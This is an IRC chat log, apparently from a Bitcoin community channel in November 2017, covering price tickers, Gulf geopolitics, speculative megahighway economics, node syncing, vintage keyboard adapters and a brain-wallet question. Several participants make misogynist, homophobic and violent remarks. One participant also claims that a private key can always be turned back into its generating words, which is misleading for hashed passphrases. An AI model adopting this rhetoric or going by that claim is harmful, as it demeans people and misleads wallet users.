Bitstamp BTCUSD last: 6761.35, vol: 26361.10812249 | Bitfinex BTCUSD last: 6747.9, vol: 87554.56617705 | Kraken BTCUSD last: 6745.0, vol: 8805.98682449 | Volume-weighted last average: 6750.58102256 1736135;1510362707;BingoBoingo;!~bcstats 1736136;1510362708;jhvh1;BingoBoingo: Current Blocks: 493963 | Current Difficulty: 1.364422081125E12 | Next Difficulty At Block: 495935 | Next Difficulty In: 1972 blocks | Next Difficulty In About: 2 weeks, 2 days, 8 hours, 3 minutes, and 20 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1736137;1510366476;shinohai;!~ticker --market all 1736138;1510366483;jhvh1;shinohai: Bitstamp BTCUSD last: 6776.87, vol: 26513.03070230 | Bitfinex BTCUSD last: 6761.6, vol: 88332.07279477 | Kraken BTCUSD last: 6767.9, vol: 8943.01026706 | Volume-weighted last average: 6765.32568035 1736139;1510366490;shinohai;wow 1736140;1510374727;mircea_popescu;BingoBoingo cheap transportation makes french "terroir" (as distinct from arab terreur) a meaningless concept. 1736141;1510374786;mircea_popescu;asciilifeform just what the bolix wanted huh 1736142;1510375489;BingoBoingo;mircea_popescu: It really does. Everything I keep reading published on connection prices says "OMG region X is expensive" 1736143;1510375503;*;BingoBoingo queries in region X, finds... Price is price is price 1736144;1510375576;mircea_popescu;the web doesn't keep up with pricing issues in this sense. 1736145;1510375617;mircea_popescu;ie there WAS a hdd price issue after asian floods, but if you searched... much like http://btcbase.org/log/2017-11-06#1733268 1736146;1510375617;a111;Logged on 2017-11-06 20:01 hanbot: in other lulz, https://archive.is/UVcTG >> 'reports of death of yet another Saudi prince' << meanwhile i was reading this morning "riadyh ritz-carlton now detention center for saudi royals", (http://archive.is/p7KPc), but tuned out when "evidence" seemed to consist of "booking websites" not having rooms available. 1736147;1510375646;mircea_popescu;there's conservation rules afoot in teh universe, and the web isn't going to produce an increase of information ; it provides a fraction of what you put in back and no more. 1736148;1510375684;BingoBoingo;Yeah, turns out source Homo Reddictius was citing consisted of a likely disinfo piece by Cloudflare 1736149;1510375756;BingoBoingo;Well, except for places where X is expensive because not built (i.e. those tiger economies) 1736150;1510376203;mircea_popescu;expensive where not built, expensive because temporary disruption (flood, bait-and-switch in switch cycle by socialist "corporation", etc) 1736151;1510376341;mircea_popescu;(fwiw marriott still reports their ryadh carlton not available for check-in. sounds moar like nationalization than anything) 1736152;1510376495;BingoBoingo;Could be cocaine and pork sausage bender? 1736153;1510376610;mircea_popescu;nah, moar like failure of orange revolution ("teh people matter, and here's a buncha dorky chicks fresh from usg "criminology" studies going topless hurr durr) had dept of blue usg move to white revolution ("teh people dun matter, here's kings-youngest-son being totally the true lost tsarevich!!!"). in this case the local pretext for legitimacy is that 32yo princelet. 1736154;1510376662;mircea_popescu;sooner or later the dorks will understand that until/unless burned down us "embassy" / all ustards coming in detained and shot, there won't be peace. 1736155;1510376738;mircea_popescu;as it is, next in the queue is plaintive missive from mohammed bin salman about how "he was tricked" and "teh deliveries didn;t live up to promises" in a few months/years/whatever. 1736156;1510376793;mircea_popescu;to keep to form he'll make a blogpost now about how "he was surprised by wealth", ers style 1736157;1510376844;mircea_popescu;amusing that this shit worked in saudi arabia where it failed so miserably in turkey. 1736158;1510376993;BingoBoingo;Well, the Saudis aren't the Turks. They have oil and their borders are protected by hot sand. Turks are surrounded and have the Mediterranian's back door in their face. 1736159;1510377055;mircea_popescu;more like, turkey actual country. saudi arabia, like venezuela, very much madmax item, "here's this oil rig surrounded by vagrants. need big lawnmower." 1736160;1510377095;mircea_popescu;incredible fucktards though, argued with the dude all summer long, had no missile-acre at the ready ? 1736161;1510377140;mircea_popescu;"bitch, you call me to a meeting i fail to return from, there's 10`000 rockets per square kilometer that take to flight. better hope they all miss, unless you're prepared to live in ruins-of-riyadh" 1736162;1510377460;BingoBoingo;My impression of Saudi Arabia is sandier, hotter Cali suburbs with more pinoys. 1736163;1510377472;mircea_popescu;nah. think -- women not allowed to drive. 1736164;1510377489;mircea_popescu;originator of the entire political system that took down teh wtc. 1736165;1510377520;BingoBoingo;Sounds more like Cali when you mention that 1736166;1510377572;mircea_popescu;and a fine example of nazi-socialism standing opposed to roossvelt-socialism. country essentially ruled by a fuhrer + the propaganda/gestapo construct (here, wahhabi clerics + "security" forces) 1736167;1510377671;BingoBoingo;Sure, both places had a history or something like it for however longly/briefly. Now just McMansions and neurosis everywhere. 1736168;1510377695;mircea_popescu;anyway. usual failure mode -- got "us trained" moles into the security half of the construct, because "more competent", which is universally false but then again disease works by the host failing to recognize the pathogens, then 30 years later wants to "futuristic cities" where "people can have fun" and obviously list aramco on nyse. 1736169;1510377808;mircea_popescu;anyway. the deeply inept handling of qatar recently (which was, at least nominally, his responsibility, even if botched 100% by ineptitude imported by ustards) and the goingnowhere in yemen promise to yield the end of the whole affair. 1736170;1510377825;mircea_popescu;conseuquently i dun think i'd buy saudi assets for less than 50% premium. 1736171;1510377838;BingoBoingo;Same as Cali. Everything was cool and patriarchy then evil USG mole Zorro fucked everything up by opening Chicano studies departments 1736172;1510377850;mircea_popescu;lol which zorro ? 1736173;1510377891;BingoBoingo;The Antonio Banderas one 1736174;1510377913;mircea_popescu;"it should help that prince mohammed, following the example of ibn saud, sees the importance of forging a special bond with the united states", sez teh official propaganda for anglotards. quite. lol. 1736175;1510378004;BingoBoingo;lol, "special relationship" is an awfully weird way of saying they blackmailed queen pantsuit during Arab sprang 1736176;1510378037;mircea_popescu;but no, there's no getting out of it : turkey-iran with a russian background much much stronger than usg.israel + usg.saudi-arabia. israel isn't coming apart just yet -- therefore the peninsula must. 1736177;1510378324;*;BingoBoingo actually saw made in Israel merchandise. Items were... plastic boxes 1736178;1510378375;BingoBoingo;Sure they J'd up the plastic part to calling them "Innovative structural foam" but... Fucking plastic boxes 1736179;1510378412;mircea_popescu;kek. by the time epithets are part of the "name" you know the marysue fiction's well caked at the edges. 1736180;1510378439;mircea_popescu;seriously, chicklit heroine meets Cool Guy McFucksticks ? i wonder what the odds are of such a name naturally occuring... 1736181;1510378482;mircea_popescu;i suppose next time i am about to call something mp-whatever ima say gooduseful-whatever instead. 1736182;1510378567;BingoBoingo;Anyways items were branded with some store private label licensed from once manufacturing company, and prominently marked "Made in Israel" because that's where other brand got their plastic boxes from too. 1736183;1510378745;mircea_popescu;great winners in all of this, of course, zee chinese -- who get to see likely lightningstrike in land far far away rather than in sea as close to home as say... taiwan. 1736184;1510378923;BingoBoingo;Eh, the ZC's have their own problems to deal with 1736185;1510378947;mircea_popescu;yeah, like building a mile-wide train-and-road belt from beijing to vienna. 1736186;1510378981;BingoBoingo;Also the structural defects inflicted by the bastard pidgin 1736187;1510379197;mircea_popescu;fwis the strategic plan is "one week silk road : car or train, take your pick". IF they do manage to build it, which isn't a given even if not necessarily unlikely ; and IF they manage to market it so it reaches their traffic goals (this part, easier), all the "vision 2030" bs by everyone else, from crown prince of saudis to kirschner prince of us to etc fade in a very very distant bokeh. 1736188;1510379262;mircea_popescu;artificially intelligent google "can not calculate driving directions" as it stands now. 1736189;1510379361;mircea_popescu;but whether it will go through turkey or through ukraine (doh. turkey, evidently) is by far the more important consideration of today. 1736190;1510379423;mircea_popescu;(suddenly us "involvement" in afghanistan more geopolitically understandable, is it) 1736191;1510379573;mircea_popescu;but on the upside -- a 80 lane highway perfect place for ai driving. can have lanes sorted by speed at a 1kmph resolution. there's a marginal but present for "american technology companies" even in chinese owned future! 1736192;1510379785;mircea_popescu;in any case the only viable alternative to "well... let's just have another war, then" i've seen anyone propose. mile-wide highway still costs a billion or two per track mile, making the whole project large enough to give substance to something like us gdp. (that it will pointedly not be in any way related to us, secondary consideration. bitcoin isn't either, to its great benefit.) 1736193;1510379896;mircea_popescu;paradoxically, there's even an argument for freight. yes, it's true that shipping is cheapest per mile. the problem with postmodernity is that the needs are so fragmented and the costs of onboarding so significant, shipping could conceivably lose out. 1736194;1510379975;mircea_popescu;in this model, rather than have a) load it on ship in a week, from the single port, and then take n weeks to reach destination, and then unload and distribute by lorry, so yes you pay 0.01 per km on sea, which is 99% of the distance, but then 10 for the servicing, making your total cost 10`000 * 0.01 + 6 * 10 = 160 1736195;1510380006;mircea_popescu;you might prefer to b) send it via train freight from exact origin to exact destination, at cost of 0.02, which is to say 8`000 * 0.02 = 160. 1736196;1510380061;mircea_popescu;whether the increased precision (no, you don't have to have your item lorried to port and then from port to dest) actually gives a 20% shorter distance, or 25 or 15% ; and whether the cost can be kept to 0.02 or even the foreseen 0.014 rather than 0.025 or 0.1 etc... 1736197;1510380064;mircea_popescu;well i guess time will tell. 1736198;1510380108;mircea_popescu;but the argument is undefeatable -- ship burns oil. train can burn electricity which can mean hydro, can mean nuclear, can mean things. things other than oil. in this sense, it's unavoidable. 1736199;1510380133;mircea_popescu;whether 2050s unavoidable or 2150s unavoidable though... 1736200;1510380231;BingoBoingo;This is the true challenge of prophetics 1736201;1510380239;mircea_popescu;rather. 1736202;1510380351;BingoBoingo;Then there's always going to be some incredibly time insensitive goods needing moving, which will preserve some form of shipping. Hence riverboats still traveling the Mississippi, but rarely with cargo that isn't bird attractant. 1736203;1510380392;mircea_popescu;it's funny how shipping counterintuitively loses to land routes. even among the romans, who were built AROUND a fucking sea, seaborne gross tonnage in any year was less than road gross tonnage in same year. 1736204;1510380426;mircea_popescu;yes road cost a whole lot more to maintain than the sea's 0. but this is a counter-argument here, we're overpowerful and desperately in need of useful work to do, ntowa. 1736205;1510380508;mircea_popescu;moreover, as pointed out before in various contexts, europe exists specifically because of road network. 1736206;1510380522;BingoBoingo;Seriously. Then again the "overpowerful" part drives river traffic construction. "why train extra 30 miles to Mississippi when build port on Kaskakia river" and other weirds 1736207;1510380561;mircea_popescu;exact problem discussed above! the issue with ports is that they, unlike train station, naturally concentrate. 1736208;1510380566;mircea_popescu;so you're stuck having to place them well. 1736209;1510380580;mircea_popescu;whereas trains... fuck... make 5. make 55. make one per mile. what diff can it possibly make. 1736210;1510380598;mircea_popescu;all euro industry was, at the time the "Common market" somewhat distant goal, served by rail spokes custom built. 1736211;1510380863;mircea_popescu;and with computerized control and much better robotics, you actually get car-level (about 50 tons) control! have the railcars switch in and out of high-speed bands! it's easy when you have 30 of them! 1736212;1510380881;mircea_popescu;piddly ass 1817s level tech of single-railtrack doesn't reallty expose the power of rail in all its glory. 1736213;1510381111;BingoBoingo;Well, packet switching is a thing. Whether the packets are bits or tons. 1736214;1510381223;mircea_popescu;quite. 1736215;1510381241;mircea_popescu;in this future worldview, us role is very much that in which turkey lingered throughout the 1800s. 1736216;1510381269;mircea_popescu;once-notable empire, meanwhile powerless, saddled with a bunch of nominal allies thatr don't like it and readily intervene militarily against it. 1736217;1510381301;mircea_popescu;the similarities are striking -- ottoman porte made it a point of not learning languages, much like us. 1736218;1510381318;mircea_popescu;i suppose this is one of those major "there are two kinds of people" things : those who speak languages, and those who don't. 1736219;1510381412;BingoBoingo;Yeah. Anyways another toxic legacy of the 80s-present action movie thing is villianizing the capable. 1736220;1510381422;BingoBoingo;In favor of Joe Average on steroids 1736221;1510381589;mircea_popescu;i guess so, at that. tv forced mistake, "gotta give the viewer steak" 1736222;1510381591;mircea_popescu;i mean stake. 1736223;1510381592;BingoBoingo;In further accounts of the empire in decline http://www.jameslafond.com/article.php?id=9465 1736224;1510381608;mircea_popescu;problem is... there's only one stake for the tv viewer, and it dun look pretty. 1736225;1510381662;BingoBoingo;Yeah. Anyways, transition from "hero spies at least speak French" to "Don't trust them Ruskies, they learn our language!!!" 1736226;1510381743;mircea_popescu;heh. 1736227;1510381914;mircea_popescu;but to revisit upstack : the item contemplated, 80 car lanes on each side of 30 traintrack lines would redefine a number of things. the new town then becomes... the switching station. every unit-of-distance the 30 tracks turn into a switch yard, 120 lines, 600 lines, whatever. in between these, the traintracs are fully reversible, meaning the trains run in arbitrary directiosn! around this yard is then built town, out of serv 1736228;1510381914;mircea_popescu;icing industry needed for switchyard maintenance, and human services for the involved humans and so on. around this town then go the thick roads. so the town of the future has a "west side" and an "east side" in the sense of... the part of town margined by east-bound or west-bound megahighway. 1736229;1510381958;mircea_popescu;by the time you end up with 500 or so 1mn strong towns dotting the mega-road, you've a whole new nation of a whole new kind. larger than current day us 1736230;1510381971;mircea_popescu;which is why and wherefore the whole "not much room in future for united states". there isn't. 1736231;1510382066;mircea_popescu;gives very palpable, estimable value to something asciilifeform already amply describes as having felt on own skin, which is... "land value" of wash dc real estate ? why, 0, it's a sea away from The Road. san francisco ? same. congo capital ? SAME. 1736232;1510382137;BingoBoingo;Short story of the transition is from George Lazenby as James Bond to Bruce Willis as accidenticop 1736233;1510382258;BingoBoingo;Anyways, Mega highway offers plenty of wonderous oppresatunities 1736234;1510382402;mircea_popescu;it has to. basically, it's mongol horde v2.0 (this is not well understood today, but the mongol horde was first and foremost -- its roadmaking. they had a sort of "red carpet roll" they went on). 1736235;1510382435;mircea_popescu;i don't expect a mongol horde to be put together without at least a little http://btcbase.org/log/2017-04-05#1638201 1736236;1510382435;a111;Logged on 2017-04-05 18:42 mircea_popescu: merv, or generally the mongol reduction of persia from a coupla million to a coupla hundred thousand is the fundamental civilisational act. not the building of the scum, but the purging of it. much like "writing prb" is not an achievement in computer science ; but purging it into trb is. 1736237;1510382534;BingoBoingo;Not to mention, those truck stops will prolly be hella wild 1736238;1510382551;mircea_popescu;except not so many trucks, since rail readily available. 1736239;1510382556;mircea_popescu;more like little vans for local delivery 1736240;1510382566;mircea_popescu;2-300km range. 1736241;1510382639;mircea_popescu;which is how this works. take say unit-of-distance, the yet undefined item of the future, to 100km. that means ~100 towns the whole length of this ; it also means a local delivery max range of 200km is ample : if you needed more than that you should have just sent teh goods one station further up/down. 1736242;1510382707;BingoBoingo;Well, plenty of pickup trucks. Just like suburbia there will be a subset of folks who purchase such to swear they've been off of mega road with it before. 1736243;1510382708;mircea_popescu;which means the "civilised world" reduces to europe, china coast, and a 2-3-4mn sqkm thin strip uniting them, with The Road in the middle and civilisation reaching out .a coupla hundred units perpedngicularily north and south. 1736244;1510382763;mircea_popescu;(state of california is 400k sqkm, for comparison. mass is 27k. 1736245;1510382858;mircea_popescu;the major winner ? why, persia, now called iran. teh age of sail adventure having been chewed up and spit out, the world is going back to itself. 1736246;1510382918;mircea_popescu;and consequently the future chances of any kind of islam that's not the deeply sensuous thing of the 1300s is zilch. saudis are headed the same place new york went. 1736247;1510384616;BingoBoingo;There's probably reasons for colonies to still be interesting in mega road world, but not the ones that though themselves empires 1736248;1510384637;mircea_popescu;same reason as always, well priced good quality cunt. 1736249;1510384657;BingoBoingo;Beaches and Bitches 1736250;1510385449;mircea_popescu;lol this chick is retarded. hopefully lafond bagged her dumb ass, wtf, "he didn't say this jokingly". rly bitch, was he really liek some military guy ? 1736251;1510385450;mircea_popescu;lord.y 1736252;1510386882;BingoBoingo;It's a strange world 1736253;1510387856;BingoBoingo;In still further equalitarian studies outta Harvard: "As with most proceedings at Harvard, the anal sex workshop placed great emphasis on equality. After the presenter noted that “not all men have penises, not all women have vaginas,” she argued that “the butthole is the great sexual equalizer. All humans have a butthole.”" 1736254;1510388546;BingoBoingo;Pairs with https://archive.is/6I8jI 1736255;1510394075;mircea_popescu;is this a purely discoursive "anal sex butthsop" ? 1736256;1510394101;mircea_popescu;there's few things less "equal" than say male anal sex receptacle and female anal sex receptacle. 1736257;1510394122;mircea_popescu;for the same money could say "car is the great equalizer, crossover and 1960s era euro cars same thing" 1736258;1510416342;asciilifeform;http://btcbase.org/log/2017-11-11#1736227 << this kind of picture is really from 'cyberpunk' alt-fyootoor where where is 1e10 people but they all somehow have money and need goodies delivered on rail 1736259;1510416342;a111;Logged on 2017-11-11 06:31 mircea_popescu: but to revisit upstack : the item contemplated, 80 car lanes on each side of 30 traintrack lines would redefine a number of things. the new town then becomes... the switching station. every unit-of-distance the 30 tracks turn into a switch yard, 120 lines, 600 lines, whatever. in between these, the traintracs are fully reversible, meaning the trains run in arbitrary directiosn! around this yard is then built town, out of serv 1736260;1510416518;asciilifeform;http://btcbase.org/log/2017-11-11#1736225 << these were doubly hilarious in bootleg ru voiceover, which is how asciilifeform watched'em 1736261;1510416518;a111;Logged on 2017-11-11 06:27 BingoBoingo: Yeah. Anyways, transition from "hero spies at least speak French" to "Don't trust them Ruskies, they learn our language!!!" 1736262;1510416542;asciilifeform;( see also e.g. http://btcbase.org/log/2017-08-24#1703070 ) 1736263;1510416542;a111;Logged on 2017-08-24 17:25 asciilifeform: or, more famously, a character referring to 'general motors' ends up speaking of a Генерал Моторс 1736264;1510416713;asciilifeform;http://btcbase.org/log/2017-11-11#1736245 << not only persia, but more or less everyone who did not ride the mcshitburger train to hell, winning in direct proportion to how much they refrained from riding it. 1736265;1510416713;a111;Logged on 2017-11-11 06:47 mircea_popescu: the major winner ? why, persia, now called iran. teh age of sail adventure having been chewed up and spit out, the world is going back to itself. 1736266;1510416729;asciilifeform;from this pov -- e.g. pyongyang, is a winner 1736267;1510418349;asciilifeform;http://btcbase.org/log/2017-11-11#1736141 << the serious minus is that it needs a serious linear accelerator . i dun expect it will become competitive commercially with classical strip'an'sem method any time soon 1736268;1510418349;a111;Logged on 2017-11-11 04:33 mircea_popescu: asciilifeform just what the bolix wanted huh 1736269;1510418434;asciilifeform;relatedly, chinese quote 0.88 cents per 1500x sem photo; for 1x1cm die (which is estimate, i dun have an xray machine here) that works out to 1-2k usd for whole thing, depending on how many layers turn up 1736270;1510418445;asciilifeform;americans quote 5-6x price, unsurprisingly, for same job. 1736271;1510418456;asciilifeform;errrr 0.88 $ 1736272;1510418532;asciilifeform;somewhat counter-intuitively, this item is the ~easiest~ part of an ic archaeological dig; the actual analysis , i expect, will take years 1736273;1510418582;asciilifeform;( and will perhaps be a good entry for those hypothetical folx who ain't here yet, but ought to be . i have no intention of doing the whole thing myself, esp. not in near term, my hands are quite full ) 1736274;1510418630;asciilifeform;it does somewhat help that the i-machine emulator src was found; the thing isn't a complete martian blackbox. 1736275;1510418913;asciilifeform;http://btcbase.org/log/2017-11-11#1736149 << don't forget 'expensive because early sunk costs'. the canonical example being the atrocious residential isps in usa , vs in third world ( where folx went straight to cheap wireless ) 1736276;1510418913;a111;Logged on 2017-11-11 04:49 BingoBoingo: Well, except for places where X is expensive because not built (i.e. those tiger economies) 1736277;1510426090;asciilifeform;meanwhile, in bizarre ro crackpotteries, http://www.securitate.org/nicu.htm 1736278;1510426132;*;BingoBoingo wondering what the weird might be with block 494023 1736279;1510426176;asciilifeform;BingoBoingo: more specifically ? 1736280;1510426223;BingoBoingo;Seems to be where a lot of TRB nodes are shown stalled. 1736281;1510426339;asciilifeform;BingoBoingo: do you have a debug tail of this wedge ? 1736282;1510426349;*;asciilifeform does not currently have even 1 up-to-top trb node ! 1736283;1510426369;asciilifeform;( zoolag is at 446213 currently ) 1736284;1510426396;asciilifeform;^ or anyone else, have ? 1736285;1510426398;asciilifeform;trinque ? 1736286;1510426428;*;BingoBoingo trying to find 1736287;1510426449;asciilifeform;dump from where 494022 was eaten, until present. 1736288;1510426690;*;BingoBoingo trying to find that point. May have been rotated over. 1736289;1510426697;asciilifeform;ugh 1736290;1510426702;asciilifeform;DON'T USE ROTATION omfg 1736291;1510426723;asciilifeform;if yer disk is too small to rotate debug.log by hand 1-2x/year, it is too small to run trb !! 1736292;1510426934;*;BingoBoingo grabbing another debug.log 1736293;1510427290;BingoBoingo;Well, other node has unrotated debug.log but is further behind than 494022 1736294;1510427742;BingoBoingo;And time fixed it http://wotpaste.cascadianhacker.com/pastes/APVmZ/?raw=true 1736295;1510427777;asciilifeform;then snoar. 1736296;1510427791;mod6;good to be watchin tho. 1736297;1510427803;mod6;every now and then they get behind a few blocks. 1736298;1510428015;asciilifeform;ohai mod6 1736299;1510428040;*;mod6 waves 1736300;1510431025;asciilifeform;watcha upto mod6 1736301;1510431091;mod6;nmu? 1736302;1510431108;asciilifeform;? 1736303;1510431147;mod6;nothing much 1736304;1510431261;mod6;you? 1736305;1510431360;asciilifeform;finally polished off a saecular chore, ~4h of ida concluding in the typical 'change this-here je to jmp' 1736306;1510431463;mod6;some hygiene 'eh? 1736307;1510431502;asciilifeform;hygiene is not the word that comes to mind. well, ~inside~ the sewage wetsuit -- hygiene.. 1736308;1510431581;mod6;gotta start somewhere 1736309;1510431738;asciilifeform;https://www.youtube.com/watch?v=olXUIcb80N0 << oblig. 1736310;1510432285;mod6;lmao 1736311;1510436444;*;ben_vulpes extracted a apple extended keyboard ii from the parental domus this morning, only to find that a) the capslock key has a physical lock and b) apparently needs some nutty 'teensy' micro to turn the ancient proprietary 'apple device bus' serial format into usb; and turning it into serial is apparently Just Not Done 1736312;1510436509;ben_vulpes;"desktop bus"* 1736313;1510436660;asciilifeform;ben_vulpes: there's an offtheshelf converter 1736314;1510436684;asciilifeform;as for capslock, there is a mod, you can remove the lock latch 1736315;1510436685;ben_vulpes;'iMate'? 1736316;1510436710;ben_vulpes;yup, going to have some fun pulling the thing apart. 1736317;1510436712;asciilifeform;mine is unlabled, looks like flattened hockey puck 1736318;1510436793;asciilifeform;( i have one of those kbd, in mint condition, and the conv box, but not currently using anywhere ) 1736319;1510436811;ben_vulpes;let me know if you recall with what to look up this ots part 1736320;1510436818;asciilifeform;i suppose it oughta be in the 'liquidation catalogue' thread 1736321;1510436831;asciilifeform;ots ? 1736322;1510436836;ben_vulpes;off the shelf 1736323;1510436889;asciilifeform;ben_vulpes: looks like https://ru.aliexpress.com/store/product/USED-ITEM-Mini-ADB-USB-to-ADB-Adapter-2-Ports-for-IMac-and-G3/224546_32679510845.html 1736324;1510436894;asciilifeform;is what i got 1736325;1510436916;ben_vulpes;aok gotcha ty 1736326;1510436961;asciilifeform;oh hey there's apparently a junk bin recipe, http://blog.jomon-lab.com/arduino-projects/adb-to-usb-adapter-using-arduino-keyboard-function/wire-connection 1736327;1510436979;asciilifeform;prolly can port to whatever micro you have lying around 1736328;1510437008;asciilifeform;( adb is a very low speed thing, easy to bitbang. somewhat like ps2 ) 1736329;1510437156;asciilifeform;https://github.com/osresearch/classicmac/blob/master/adb2usb/adb2usb.ino << 1 possible , for shituino 1736330;1510437350;asciilifeform;includes serial example 1736331;1510437372;asciilifeform;( i gotta ask, whaddaya want with a ~serial~ kbd, ben_vulpes ? ) 1736332;1510437397;asciilifeform;or didja mean ps2. 1736333;1510437465;ben_vulpes;ps2, the depths of my golden era hardware ignorance knows no plumb 1736334;1510437588;asciilifeform;it'd be, incidentally, an ok fpga student project 1736335;1510437608;asciilifeform;if you have the lattice fpga demo pcb and feel like practice. 1736336;1510437834;asciilifeform;oh hey ben_vulpes do you have a parallel port ? 1736337;1510437878;asciilifeform;iirc there was a cheap&angry universal-bitbanged-ancient-keyboards lpt thing for linux kernel. 1736338;1510437893;ben_vulpes;hm 1736339;1510437895;asciilifeform;needs 3 wires. 1736340;1510437919;ben_vulpes;negative 1736341;1510437924;asciilifeform;aite. 1736342;1510437944;ben_vulpes;woulda been cool tho 1736343;1510437963;asciilifeform;ye olde lpt is still unsurpassed in 'need to move arbitrary bits on these here wires' problems. 1736344;1510438020;ben_vulpes;not complicated enough to survive in the brave new world. 1736345;1510438078;asciilifeform;other examples of why you want a lpt, http://btcbase.org/log/2015-06-12#1162225 1736346;1510438078;a111;Logged on 2015-06-12 19:47 ascii_field: every time i have to burn (or even read) an eeprom i end up doing something retarded like this - http://loper-os.nfshost.com/wp-content/mwredux/romsucker_working.png 1736347;1510438135;ben_vulpes;messy, but hey at least visually inspectable. 1736348;1510438222;asciilifeform;!#s romsucker 1736349;1510438223;a111;3 results for "romsucker", http://btcbase.org/log-search?q=romsucker 1736350;1510438242;asciilifeform;^ schematic + source in there sumwhere. 1736351;1510438313;asciilifeform;if you're not only poor, reader, but in manchuria, can replace the 8255 with 74xx ttl, but i'll leave it as an exercise. 1736352;1510438387;asciilifeform;( really you only need 1 latch, as for instance in my ancient http://www.loper-os.org/vintage/parallelsid/parasid.html ) 1736353;1510440351;asciilifeform;in other bolix lulz, http://www.loper-os.org/?p=186&cpage=1#comment-18287 1736354;1510440790;asciilifeform;!#s whisperers 1736355;1510440790;a111;16 results for "whisperers", http://btcbase.org/log-search?q=whisperers 1736356;1510440793;asciilifeform;^ see also. 1736357;1510444425;trinque;http://logs.bvulpes.com/trilema?d=2017-11-11#238237 << all good over here. deedbot.org lists its node's current block count, updated twice hourly 1736358;1510444731;BingoBoingo;!~ticker --market all 1736359;1510444739;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6370.9, vol: 14976.25423386 | Bitfinex BTCUSD last: 6302.7, vol: 72843.79787908 | Kraken BTCUSD last: 6329.9, vol: 6932.19852237 | Volume-weighted last average: 6315.46947334 1736360;1510445417;BingoBoingo;Prognostication found in the wild: http://www.lessonoflives.com/if-these-tweets-are-legit-the-dnc-is-on-its-last-leg/ 1736361;1510445758;BingoBoingo;Naturally this prognostication ignores the pansuit purging of their pretense at cultural capital with: "Firing up at the end of this month is a maybe. Firing up before the end of 2017 is looking incredibly Likely. 1736362;1510445758;BingoBoingo;"Star Trek" icon George Takei has been accused of sexual assault by a former model and actor stemming from an incident that allegedly occurred in 1981. Scott R. Brunton alleged that when he was 23 years old, Takei took advantage of him after the two had returned from a night out together. Brunton explained that he has been hesitant to come forward about the alleged incident for years, because he felt no one would believe him." 1736363;1510445832;BingoBoingo;Apparently now in addition to "allies" homosexual men have become problematic for pantsuit 1736364;1510446695;*;trinque has only hearsay knowledge of the subj, but thought old fags going for young dudes was the rule. 1736365;1510448687;BingoBoingo;Kinda the point, pantsuit loses whole demographic 1736366;1510452573;ag3nt_zer0;ahoy 1736367;1510452638;ag3nt_zer0;i have a question I am a bit terrified to ask 1736368;1510452825;ag3nt_zer0;it feels like a no-brainer but ahhh... if I use pete_dushenski's high entropy wallet method, I only need the private key generated by the words right? I dont need to keep the words... seems obviously dumb when I write it but the redditards are throwing me off here 1736369;1510452891;ag3nt_zer0;hope i dont find out im the tard here 1736370;1510453273;ag3nt_zer0;i think the confusion for me stems from hearing two different descriptions of brain wallets - one described as a way to, if i recall correctly, convert a privkey to a string of words to then be memorized and carried in brain over international borders or what not... and the other encounter I have with this concept is pete's method of generating a high entropy keypair and I am pretty sure I am answering my own question here but wou 1736371;1510453274;ag3nt_zer0;ce 1736372;1510453586;ag3nt_zer0;to be clear i was re-reading pete's article and followed the reddit link to the guy who lost the 4BTC and it was this comment that got me all wound up: "The passphrase has to be random (and necessarily, difficult to memorize). There is no way around this, period. If the prospect of memorizing 12 random words is daunting to you (and it should be - if you forget it, your money is gone), then don't use a brain wallet." 1736373;1510453726;ag3nt_zer0;but it looks is this guy is speaking of not being able to access the privkey because said example forgot the words reveal that key, and neither did the person write down the privkey? 1736374;1510453746;ag3nt_zer0;*the words that reveal ^^^ 1736375;1510454662;asciilifeform;!#s brainwallet 1736376;1510454662;a111;121 results for "brainwallet", http://btcbase.org/log-search?q=brainwallet 1736377;1510454826;asciilifeform;ag3nt_zer0: see ^ threads, in particular http://btcbase.org/log/2015-06-10#1159417 1736378;1510454826;a111;Logged on 2015-06-10 17:13 ascii_field: incidentally, most people are already using the worst aspects of brainwallet -and- conventional crypto 1736379;1510454862;ag3nt_zer0;i have the keypair... is that enough? 1736380;1510454895;ag3nt_zer0;asciilifeform ^ 1736381;1510454895;asciilifeform;what means 'have' here ? 1736382;1510454947;ag3nt_zer0;i followed petes method except for the printing. i instead hand wrote the pub and priv... and i possess those 1736383;1510454951;ag3nt_zer0;i have those 1736384;1510454972;ag3nt_zer0;i through out the words though 1736385;1510454974;ag3nt_zer0;threw 1736386;1510454980;ag3nt_zer0;:/ 1736387;1510455019;asciilifeform;ag3nt_zer0: are you familiar with mnemonism ? 1736388;1510455027;ag3nt_zer0;no 1736389;1510455050;asciilifeform;type of performance art , circus 'magic' 1736390;1510455056;ag3nt_zer0;ok yes 1736391;1510455069;ag3nt_zer0;memorizes lengthy things 1736392;1510455069;asciilifeform;reciting 1e6 digits of pi etc 1736393;1510455078;ag3nt_zer0;ok 1736394;1510455080;asciilifeform;ever try it ? 1736395;1510455087;ag3nt_zer0;yes 1736396;1510455091;ag3nt_zer0;i udsed petes method 1736397;1510455094;ag3nt_zer0;used 1736398;1510455103;asciilifeform;then you know what the words were for. 1736399;1510455106;ag3nt_zer0;with the dictionary and the dice and 13 words and all that 1736400;1510455128;asciilifeform;so what's the q then 1736401;1510455130;ag3nt_zer0;hmmm 1736402;1510455158;ag3nt_zer0;i assumed until today that words were utilized to create a keypair 1736403;1510455170;ag3nt_zer0;so once i had the keypair i assumed the words unecessary 1736404;1510455178;ag3nt_zer0;but they are called a "passphrase" here and there 1736405;1510455183;ag3nt_zer0;so im not sure 1736406;1510455230;asciilifeform;they're a ( not imho particularly great, but we digress ) mnemonic device, is all. 1736407;1510455349;ag3nt_zer0;so asciilifeform, if I have stored safely the private key, do i need the words to unlock that or something? or was it ok to discard the words? 1736408;1510455388;asciilifeform;think, if you have the key per se, you can always convert it to the 'words' form again later. 1736409;1510455415;asciilifeform;just as you can write number 10 as 0xa in base 16 etc 1736410;1510455513;asciilifeform;ag3nt_zer0: btw when you discuss an article, it is good form to link to it 1736411;1510455524;asciilifeform;folx should not have to dig to find it 1736412;1510455644;ag3nt_zer0;asciilifeform: yes understood... and thanks for your time here! 1736413;1510455650;asciilifeform;np 1736414;1510470230;deedbot;http://www.contravex.com/2017/11/12/bigs-vancouver-house-the-last-pied-a-terre-youll-ever-need/ << Contravex: A blog by Pete Dushenski - BIGs Vancouver House: The last pied--terre youll ever need. 1736415;1510473331;BingoBoingo;!~ticker --market all 1736416;1510473339;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6134.65, vol: 26871.16333225 | Bitfinex BTCUSD last: 6206.9, vol: 134430.16372189 | Kraken 